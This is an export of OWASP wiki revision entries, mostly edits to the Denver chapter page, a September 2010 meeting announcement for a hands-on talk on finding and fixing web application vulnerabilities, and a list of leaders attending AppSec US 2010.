&lt;br /&gt;
&amp;lt;!-- We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF.  We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).&lt;br /&gt;
&lt;br /&gt;
We are also looking at doing a static analysis working group.  Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.&lt;br /&gt;
&lt;br /&gt;
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.&lt;br /&gt;
&lt;br /&gt;
Interested?  Let us know.  Tweet with hashtag #owasp303 or email us at froc@owasp.org. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Front Range OWASP Conference (FROC 2010) =====&lt;br /&gt;
[[Front_Range_OWASP_Conference_2010|FROC 2010]] was a sellout success! Thanks for your support.  The [http://www.surveymonkey.com/sr.aspx?sm=Fn2UBK3eyju0z2k3B8XpvHvs9s_2bdRO1BS428Of_2f9ZA0_3d survey results] are now posted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====OWASP Podcast=====&lt;br /&gt;
[http://www.owasp.org/index.php/OWASP_Podcast OWASP Podcast]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;Denver&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Questions, Comments==&lt;br /&gt;
Questions can be directed to &lt;br /&gt;
&lt;br /&gt;
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org&lt;br /&gt;
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Chapter Meetings ====&lt;br /&gt;
&lt;br /&gt;
== Future Meetings == &lt;br /&gt;
&amp;lt;!-- TBD&lt;br /&gt;
&lt;br /&gt;
We have had several people ask that our next chapter meeting be a walkthrough of the FROC2010 CTF.  We are looking at Wed, 21 July 2010 for this event in a new location near downtown Denver (though with free parking!).&lt;br /&gt;
&lt;br /&gt;
We are also looking at doing a static analysis working group.  Due to the [http://www.theregister.co.uk/2010/04/21/white_house_open_sources_code/ hype] surrounding the recent adoption of Drupal by the White House and the [http://www.theregister.co.uk/2010/05/10/drupal_security_bug/ row] that ensued when an XSS flaw was found recently, OWASP is keen to help.&lt;br /&gt;
&lt;br /&gt;
Our friends at [http://www.fortify.com/ Fortify Software] and a [http://drupal.org/user/36762 local] OWASP'er who is also a member of the Drupal Security team have proposed that our next meeting be a half day working session to perform static analysis and verification on Drupal.&lt;br /&gt;
&lt;br /&gt;
Interested?  Let us know.  Tweet with hashtag #owasp303 or email us at froc@owasp.org. --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Denver September 2010 meeting|September 29th 2010: Eric Duprey: Application Vulnerability Shooting Gallery]]&lt;br /&gt;
&lt;br /&gt;
== Past Meetings ==&lt;br /&gt;
[[Denver August 2010 meeting|August 18th 2010: Clint Pollock: Protecting Your Applications from Backdoors]]&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2010|June 2nd 2010: Front Range OWASP Conference]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2010 meeting|January 20th 2010: John Evans: Securing Webapps: An Illustrative Overview]]&lt;br /&gt;
&lt;br /&gt;
[[Denver November 2009 meeting|November 18th 2009: Anton Rager: Advanced XSS]]&lt;br /&gt;
&lt;br /&gt;
[[Denver August 2009 meeting|August 27th 2009: Jon Rose: Security in the Clouds]]&lt;br /&gt;
&lt;br /&gt;
[[Denver May 2009 meeting|May 2009: Dr. Joseph McComb &amp;amp; and Daniel Weiske: Compliance and application security testing]]&lt;br /&gt;
&lt;br /&gt;
[[Front_Range_OWASP_Conference_2009|March 2009: Front Range OWASP Conference (SnowFROC)]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2009 meeting|January 2009: David Campbell &amp;amp; Eric Duprey: Guided Tour: AppSec NYC '08 CTF]]&lt;br /&gt;
&lt;br /&gt;
[[Denver October 2008 meeting|October 2008: Alex Smolen: The OWASP ASP .NET ESAPI]]&lt;br /&gt;
&lt;br /&gt;
[[Denver September 2008 meeting|September 2008: John Dickson: Black Box vs. White Box: Different App Testing Strategies]]&lt;br /&gt;
&lt;br /&gt;
[[Denver August 2008 meeting|August 2008: Dan Cornell: Static Analysis]]&lt;br /&gt;
&lt;br /&gt;
[[Denver July 2008 meeting|July 2008: David Byrne &amp;amp; Eric Duprey: Grendel-Scan]]&lt;br /&gt;
&lt;br /&gt;
[[Front Range OWASP Conference|June 2008: Front Range OWASP Conference: Jeremiah Grossman, Robert Hansen, and more!]]&lt;br /&gt;
&lt;br /&gt;
[[Denver May 2008 meeting|May 2008: David Campbell &amp;amp; Eric Duprey: XSS Attacks &amp;amp; Defenses]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2008 meeting|April 2008: Ryan Barnett: Virtual Patching with ModSecurity]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2008 meeting|February 2008: Michael Sutton: SQL Injection Revisited]]&lt;br /&gt;
&lt;br /&gt;
[[Denver June 2007 meeting|June 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver April 2007 meeting|April 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver February 2007 meeting|February 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver January 2007 meeting|January 2007]]&lt;br /&gt;
&lt;br /&gt;
[[Denver November 2006 meeting|November 2006]]&lt;br /&gt;
&lt;br /&gt;
==[[Related_Organizations|Local Organizations of Interest]]==&lt;br /&gt;
&lt;br /&gt;
==== Mailing List ====&lt;br /&gt;
Join the [http://lists.owasp.org/mailman/listinfo/owasp-denver OWASP Denver Mailing List] to receive meeting notifications via email&lt;br /&gt;
&lt;br /&gt;
==== Twitter Feed @owasp303 ====&lt;br /&gt;
Denver OWASP has created a [http://twitter.com/owasp303 Twitter feed @owasp303] to keep you in the loop.  Whilst the mailing list is primarily intended to be low-traffic and only provide updates regarding the times, locations, and topics for chapter meetings, the Twitter feed will also provide noteworthy appsec updates.&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''&lt;br /&gt;
&amp;lt;twitter&amp;gt;55021150&amp;lt;/twitter&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| style=&amp;quot;width: 110px; font-size: 95%; color: rgb(0, 0, 0);&amp;quot; | &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Resources====&lt;br /&gt;
&lt;br /&gt;
=====Denver OWASP Chapter Leaders=====&lt;br /&gt;
*David Campbell, Denver OWASP: dcampbell 'at' owasp.org&lt;br /&gt;
*Eric Duprey, Denver OWASP: eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
=====Key OWASP Resources=====&lt;br /&gt;
* http://www.owasp.org/images/4/41/ASVS_One_Page_Handout.pdf&lt;br /&gt;
* http://www.owasp.org/images/3/31/ESAPI_One_Page_Handout.pdf&lt;br /&gt;
* http://www.owasp.org/images/a/a1/Legal_One_Page_Handout.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/a/a3/How_ESAPI_Works.pdf&lt;br /&gt;
* http://www.owasp.org/images/a/ac/LAMP_Should_be_Spelled_LAMPE.pdf&lt;br /&gt;
* http://www.owasp.org/images/0/01/Getting_started_designing_for_a_level_of_assurance.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/index.php/Agile_Software_Development:_Don%27t_Forget_EVIL_User_Stories&lt;br /&gt;
* http://www.owasp.org/index.php/Man_vs._Code&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/4/4e/OWASP_ASVS_2009_Web_App_Std_Release.pdf&lt;br /&gt;
* &lt;br /&gt;
* http://www.owasp.org/images/c/cd/PHP-ESAPI_1.0a_install.pdf&lt;br /&gt;
* http://www.owasp.org/images/6/67/PHP-ESAPI_1.0a_ReleaseNotes.pdf&lt;br /&gt;
&lt;br /&gt;
=====Chapter Management Links=====&lt;br /&gt;
[[Pizza|Best pizza in Centennial]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89112</id>
		<title>Denver September 2010 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89112"/>
				<updated>2010-09-12T02:42:18Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: added creds stuff :)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;q=hosting.com&amp;amp;sll=39.699262,-104.986725&amp;amp;sspn=0.159814,0.258522&amp;amp;ie=UTF8&amp;amp;radius=8.24&amp;amp;split=1&amp;amp;rq=1&amp;amp;ev=zi&amp;amp;hq=hosting.com&amp;amp;hnear=&amp;amp;ll=39.699262,-104.986725&amp;amp;spn=0.159814,0.258522&amp;amp;z=12&amp;amp;iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==&lt;br /&gt;
&lt;br /&gt;
=== Eric Duprey: &amp;quot;Application Vulnerability Shooting Gallery&amp;quot; ===&lt;br /&gt;
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged.   Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high.  One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications.  It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Presenter: '''Eric Duprey'''&lt;br /&gt;
&lt;br /&gt;
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter.  For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.  Eric has presented talks at major security conferences including DEFCON and SANS penetration testing summit.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop, courtesy of [http://hosting.com/ Hosting.com]&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89111</id>
		<title>Denver September 2010 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89111"/>
				<updated>2010-09-12T02:40:07Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;q=hosting.com&amp;amp;sll=39.699262,-104.986725&amp;amp;sspn=0.159814,0.258522&amp;amp;ie=UTF8&amp;amp;radius=8.24&amp;amp;split=1&amp;amp;rq=1&amp;amp;ev=zi&amp;amp;hq=hosting.com&amp;amp;hnear=&amp;amp;ll=39.699262,-104.986725&amp;amp;spn=0.159814,0.258522&amp;amp;z=12&amp;amp;iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==&lt;br /&gt;
&lt;br /&gt;
=== Eric Duprey: &amp;quot;Application Vulnerability Shooting Gallery&amp;quot; ===&lt;br /&gt;
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged.   Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high.  One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications.  It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Presenter: '''Eric Duprey'''&lt;br /&gt;
&lt;br /&gt;
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter.  For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop, courtesy of [http://hosting.com/ Hosting.com]&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89110</id>
		<title>Denver September 2010 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89110"/>
				<updated>2010-09-12T02:38:22Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;q=hosting.com&amp;amp;sll=39.699262,-104.986725&amp;amp;sspn=0.159814,0.258522&amp;amp;ie=UTF8&amp;amp;radius=8.24&amp;amp;split=1&amp;amp;rq=1&amp;amp;ev=zi&amp;amp;hq=hosting.com&amp;amp;hnear=&amp;amp;ll=39.699262,-104.986725&amp;amp;spn=0.159814,0.258522&amp;amp;z=12&amp;amp;iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==&lt;br /&gt;
&lt;br /&gt;
=== Eric Duprey: &amp;quot;Application Vulnerability Shooting Gallery&amp;quot; ===&lt;br /&gt;
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''&lt;br /&gt;
&lt;br /&gt;
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged.   Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high.  One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.&lt;br /&gt;
&lt;br /&gt;
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications.  It will cover discovering vulnerabilities at runtime, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.&lt;br /&gt;
&lt;br /&gt;
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)&lt;br /&gt;
&lt;br /&gt;
Presenter: '''Eric Duprey'''&lt;br /&gt;
&lt;br /&gt;
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter.  For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop, courtesy of [http://hosting.com/ Hosting.com]&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89109</id>
		<title>Denver September 2010 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89109"/>
				<updated>2010-09-12T02:27:43Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: grammatical fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;q=hosting.com&amp;amp;sll=39.699262,-104.986725&amp;amp;sspn=0.159814,0.258522&amp;amp;ie=UTF8&amp;amp;radius=8.24&amp;amp;split=1&amp;amp;rq=1&amp;amp;ev=zi&amp;amp;hq=hosting.com&amp;amp;hnear=&amp;amp;ll=39.699262,-104.986725&amp;amp;spn=0.159814,0.258522&amp;amp;z=12&amp;amp;iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==&lt;br /&gt;
&lt;br /&gt;
=== Eric Duprey: &amp;quot;Application Vulnerability Shooting Gallery&amp;quot; ===&lt;br /&gt;
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''&lt;br /&gt;
&lt;br /&gt;
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged.   Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high.  One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.&lt;br /&gt;
&lt;br /&gt;
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications.  It will cover discovering vulnerabilities, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.&lt;br /&gt;
&lt;br /&gt;
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)&lt;br /&gt;
&lt;br /&gt;
Presenter: '''Eric Duprey'''&lt;br /&gt;
&lt;br /&gt;
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter.  For several years, Eric has been performing application security assessments, penetration testing and source code review for major enterprise companies and working with application developers to remediate vulnerable code.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop, courtesy of [http://hosting.com/ Hosting.com]&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89108</id>
		<title>Denver September 2010 meeting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Denver_September_2010_meeting&amp;diff=89108"/>
				<updated>2010-09-12T02:20:27Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: created&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Wednesday 29 September 2010, 6pm @ [http://maps.google.com/maps?f=q&amp;amp;source=s_q&amp;amp;hl=en&amp;amp;q=hosting.com&amp;amp;sll=39.699262,-104.986725&amp;amp;sspn=0.159814,0.258522&amp;amp;ie=UTF8&amp;amp;radius=8.24&amp;amp;split=1&amp;amp;rq=1&amp;amp;ev=zi&amp;amp;hq=hosting.com&amp;amp;hnear=&amp;amp;ll=39.699262,-104.986725&amp;amp;spn=0.159814,0.258522&amp;amp;z=12&amp;amp;iwloc=A Hosting.com] [http://denverowasp.eventbrite.com/ RSVP Now!] ==&lt;br /&gt;
&lt;br /&gt;
=== Eric Duprey: &amp;quot;Application Vulnerability Shooting Gallery&amp;quot; ===&lt;br /&gt;
''How vulnerabilities make it into your business applications, how to find them, and how to kill them - Laptop recommended''&lt;br /&gt;
&lt;br /&gt;
Despite years of publicity, the common classes of web application vulnerabilities remain essentially unchanged.   Lists of the most common and important vulnerabilities in application software (the OWASP Top 10, for example) are nearly identical from 2003 to today, and the prevalence of these vulnerabilities remains alarmingly high.  One thing that is still clearly lacking is awareness of common and serious vulnerabilities, how they are detected, how they are exploited, and how they can be systematically eliminated.&lt;br /&gt;
&lt;br /&gt;
This is a hands-on presentation which will demonstrate common vulnerabilities in various real-world-like applications.  It will cover discovering vulnerabilities, identifying them in source code, and uniform ways to fix these vulnerabilities using open and freely available tools.&lt;br /&gt;
&lt;br /&gt;
(It is recommended to bring a laptop to this event if possible -- while it is possible to gain benefit from the presentation without it, having a laptop present will enable you to jump into hands-on tactical examples in real-time)&lt;br /&gt;
&lt;br /&gt;
Presenter: '''Eric Duprey'''&lt;br /&gt;
&lt;br /&gt;
Eric Duprey is the co-chapter-leader of the Denver OWASP Chapter.  For several years, Eric has been performing application security assessments, penetration testing and source code for major enterprise companies and working with application developers to remediate vulnerable code.&lt;br /&gt;
&lt;br /&gt;
=== Agenda ===&lt;br /&gt;
* 6pm: Pizza &amp;amp; pop, courtesy of [http://hosting.com/ Hosting.com]&lt;br /&gt;
* 6:30pm: Introduction and Chapter business&lt;br /&gt;
* 6:45pm --&amp;gt; 8pm: Presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/Denver Back to OWASP Denver]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AppSec_US_2010,_CA/Attending_Owasp_Leaders&amp;diff=88595</id>
		<title>AppSec US 2010, CA/Attending Owasp Leaders</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AppSec_US_2010,_CA/Attending_Owasp_Leaders&amp;diff=88595"/>
				<updated>2010-09-02T20:17:58Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: added self, minor cleanup&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Page to manage the participation of the OWASP leaders at the [[AppSec_US_2010,_CA|AppSec USA in Irvine USA]]&lt;br /&gt;
 &lt;br /&gt;
===Attending Leaders - Confirmed===&lt;br /&gt;
&lt;br /&gt;
* [[User:Dancornell|Dan Cornell]]- ''San Antonio Chapter and Global Membership Committee''&lt;br /&gt;
* Tony UV - ''Atlanta Chapter''&lt;br /&gt;
* [[User:Jmanico|Jim Manico]] - ''Podcast Project''&lt;br /&gt;
* [[User:MichaelCoates|Michael Coates]] - ''AppSensor project and Global Membership Committee''&lt;br /&gt;
* [[User:Knoblochmartin|Martin Knobloch]] - ''Education and Connections Committee''&lt;br /&gt;
* [[User:Rsnake|Robert Hansen]] - ''Connections Committee''&lt;br /&gt;
* [[User:Mtesauro|Matt Tesauro]] - ''Live CD project, Board Member''&lt;br /&gt;
* [[User:Wichers|Dave Wichers]] - ''Top 10 project, Board Member''&lt;br /&gt;
* [[User:brennan|Tom Brennan]] - ''NYC Chapter Leader, RFP Criteria project, OWASP-CRM, Board Member''&lt;br /&gt;
* [[User:Jeff_Williams|Jeff Williams]] - ''ESAPI project, Board Member''&lt;br /&gt;
* [[User:Dinis.cruz|Dinis Cruz]] - ''O2 Platform project, Board Member''&lt;br /&gt;
* [[User:Dc|David Campbell]] - ''Denver Chapter, Industry Committee''&lt;br /&gt;
* [[User:Eduprey|Eric Duprey]] - ''Denver Chapter''&lt;br /&gt;
* [[User:Justin42|Justin Clarke]] - ''London Chapter and Connections Committee''&lt;br /&gt;
* Roman Hustad - ''Sacramento Chapter''&lt;br /&gt;
* Peter Dean - ''NYC Chapter Leader''&lt;br /&gt;
* Georg Hess - ''German Chapter, Industry Committee''&lt;br /&gt;
* John Steven - ''NoVA Chapter Lead''&lt;br /&gt;
&lt;br /&gt;
'''Part of the conference organization'''&lt;br /&gt;
* Cassio Goldschmidt - ''Los Angeles Chapter''&lt;br /&gt;
* [[:User:Tin Zaw|Tin Zaw]] - ''Los Angeles Chapter''&lt;br /&gt;
* Howard Fore - ''Atlanta Chapter (Bring a Developer Attendee)''&lt;br /&gt;
* Jon Bango - ''Atlanta Chapter (Bring a Developer Attendee)''&lt;br /&gt;
* [[User:Richard greenberg|Richard Greenberg]] - ''Los Angeles Chapter''&lt;br /&gt;
* [http://twitter.com/nilematotle Neil Matatall] - ''[[http://www.owasp.org/index.php/Orange_County Orange County Chapter]]''&lt;br /&gt;
&lt;br /&gt;
===Also attending (part of OWASP community)===&lt;br /&gt;
* Joseph Dawson&lt;br /&gt;
&lt;br /&gt;
===Attending Leaders - TBC===&lt;br /&gt;
* [[User:Lorna Alamri|Lorna Alamri]] - ''Connections Committee''&lt;br /&gt;
&lt;br /&gt;
===Key WebAppSec players===&lt;br /&gt;
objective: identfy potential synergies between WebAppSec industry players and OWASP leaders (for example too meet and have a meeting)&lt;br /&gt;
&lt;br /&gt;
* Firefox Browser &lt;br /&gt;
** There are a number of Firefox employees participating and they have shown interest in talking to OWAPS about how we can work together&lt;br /&gt;
&lt;br /&gt;
===Developers and QA participating===&lt;br /&gt;
'''Sponsored by the Atlanta Chapter'''&lt;br /&gt;
Howard Fore (Atlanta Developer) - Howard Fore is a senior web developer in Atlanta, Georgia. He's involved in some high-visibility web projects at the Federal Reserve Bank of Atlanta. Increasing awareness of secure software development practices is an departmental objective for 2010 and he's a member of the security workgroup, which is leading the way in that endeavor. Other practices the security workgroup are implementing include static code analysis and code inspection.&lt;br /&gt;
&lt;br /&gt;
Jon Bango (Atlanta Developer) - Jon Bango is an Information Technology professional with over 13 years experience in the education, financial services and retail industries. Primarily working at the enterprise level, Jon has utilized the J2EE stack in building web applications for the largest home improvement retailer in the world. Most recently he has branched out into RIA technologies working in Adobe Flex and Microsoft Silverlight. Currently, Jon has transitioned into the dark arts at his company’s Information Assurance department in which the groundwork has been laid to utilize his developer talents to create a company wide secure coding initiative.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Question:Should we also do the same tracking for other Developers and QA/Testing professionals?''&lt;br /&gt;
&lt;br /&gt;
===To do (tasks)===&lt;br /&gt;
* for each each participant&lt;br /&gt;
** link to MediaWiki user page&lt;br /&gt;
** add twitter accounts&lt;br /&gt;
*Travel arrangements&lt;br /&gt;
**  map travel dates&lt;br /&gt;
** when/where they are arriving &lt;br /&gt;
** where are they staying&lt;br /&gt;
* figure out what to do with the leaders when they are there&lt;br /&gt;
* should we create a welcome pack for these leaders?&lt;br /&gt;
* should we see if they need help in their travel arrangements?&lt;br /&gt;
* should we see if its possible to find a local host for the accomodation (it is always better than going into an hotel)?&lt;br /&gt;
* do we need a budget? if so, how much?&lt;br /&gt;
&lt;br /&gt;
[[Category:Connections Committee]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84419</id>
		<title>Front Range OWASP Conference 2010</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&amp;diff=84419"/>
				<updated>2010-06-03T21:59:44Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --&amp;gt;&lt;br /&gt;
FROC2010 was a major success!  If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;!-- Header --&amp;gt;&lt;br /&gt;
====Welcome====  &lt;br /&gt;
[[Image:Froc2010_sm.png|200px]]&lt;br /&gt;
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''&lt;br /&gt;
&lt;br /&gt;
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! &lt;br /&gt;
&lt;br /&gt;
